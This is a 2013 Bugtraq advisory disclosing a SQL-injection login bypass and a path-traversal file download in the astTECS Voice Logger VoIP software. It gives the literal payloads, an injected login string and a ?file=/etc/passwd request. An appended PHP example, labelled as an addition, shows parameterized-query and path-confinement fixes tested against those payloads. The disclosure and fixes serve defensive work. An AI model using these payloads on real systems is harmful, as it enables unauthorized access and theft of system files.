Message-ID: <CAHKpqwauhj94Gya_8P_tXSLOVidBVFbabr6MML_bg2pCZDj8WQ@mail.gmail.com>
Date: Tue, 16 Jul 2013 11:01:05 +0200
From: Michał Błaszczak <blaszczakm@...il.com>
To: bugtraq@...urityfocus.com
Subject: Voice Logger astTECS - bypass login & arbitrary file download

Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin

line: 168 file: manager_login.server.php

2) arbitrary file download

http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
line: 2 file: records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
line: 2 file: records.php


3) and other security bugs


Michał Błaszczak
http://blaszczakm.blogspot.com
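
The two findings above map to two standard fixes, shown here as an added example that is not part of the original message and is not astTECS code: a bound-parameter login query and a download path confined to one directory. It assumes the login value reaches a SQL query and `file` reaches a file read unchanged; the `managers` table, `check_login`, `resolve_recording` and the sample data are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical schema: managers(login, pass_hash).
// The login value is bound as data and never spliced into the SQL text.
function check_login(PDO $db, string $login, string $password): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM managers WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// Return the canonical path of a recording inside $baseDir, or null if the
// request resolves anywhere else (absolute paths, ../ sequences, symlinks).
function resolve_recording(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: in-memory SQLite and a temporary recordings directory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE managers (login TEXT PRIMARY KEY, pass_hash TEXT)');
$db->prepare('INSERT INTO managers VALUES (?, ?)')
   ->execute(['admin', password_hash('constructed-secret', PASSWORD_DEFAULT)]);

$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rec_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'call-0001.wav', 'constructed');

var_dump(check_login($db, "admin' or 1='1", 'admin'));   // login string from item 1
var_dump(check_login($db, 'admin', 'constructed-secret'));
var_dump(resolve_recording($dir, '/etc/passwd'));        // file value from item 2
var_dump(resolve_recording($dir, 'call-0001.wav') !== null);

unlink($dir . DIRECTORY_SEPARATOR . 'call-0001.wav');
rmdir($dir);
```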
